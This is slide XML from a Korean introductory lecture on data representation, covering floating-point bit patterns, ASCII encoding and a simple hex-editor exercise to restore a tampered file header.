                </a:solidFill>
              </a:rPr>
              <a:t>Magic Number</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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a:t>Q) 0.125 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 부동 소수점으로 나타내 보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>=&gt; 0 01111100  0000 0000 0000 0000 0000 000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>실수의 표현</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 부동소수점</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>인거</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 같다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>구해보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>0 1111011 10011001100110011001101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>   +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>0 1111100 10011001100110011001101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>parseInt</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는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>형으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>바꿀수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 있는 함수이다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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>첫번째 줄의 실수 값을 계산한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>두번째 줄의 실수 값을 계산한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>답은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>0.3!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>먼저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>가수부의 값을 가져와서 생략되어진 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>을 추가한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>그리고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>진수로 변환한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="105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a:t>지수부도 마찬가지로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>진수로 변환해준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>Magic Number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>로 더해준 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>127 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>을 빼 준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>Mantissa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>는 현재 원래의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>1.xxx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>값보다 정확히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>2^23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>배</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>큰 값이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>따라서 지수부에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t>을 빼 주어 균형을 맞추어 준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="105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a:t>결과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" err="1"/>
              <a:t>실수부</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>2^(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" err="1"/>
              <a:t>지수부</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="105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sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>자료의 표현종류</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sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>자료의 표현 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– ASCII </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>코드</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임의의 친구 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>한명의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 영어이름을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>,</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ASCII </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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옆 학생은 들은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>ASCII </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 표현해보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>코드를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 이해할 수 있다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sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>자료의 표현 </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파일 헤더</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>변조된것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 같다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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>있을꺼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 같다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파일을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>복원하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Hxd</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를 이용해보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이해할 수 있다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Download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>버튼을 클릭하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>unknown_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Hxd_setup.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 다운받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="007A37"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="007A37"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="007A37"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="007A37"/>
                </a:solidFill>
              </a:rPr>
              <a:t>간단한 바이너리 분석 도구</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
              <a:solidFill>
                <a:srgbClr val="007A37"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설치를 진행한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a: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en-US" altLang="ko-KR" sz="1000">
              <a:solidFill>
                <a:srgbClr val="007A37"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>Hdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>unknown_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>드래그하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일을 바이너리 형태로 본다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4. 01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>덮혀져있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 부분 아래에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 헤더로 추측되는 부분을 발견한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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/Plan/Defcybsec</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>강의안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국방 사이버 보안</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교과목</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소개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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>
                      </a:r>
                      <a:r>
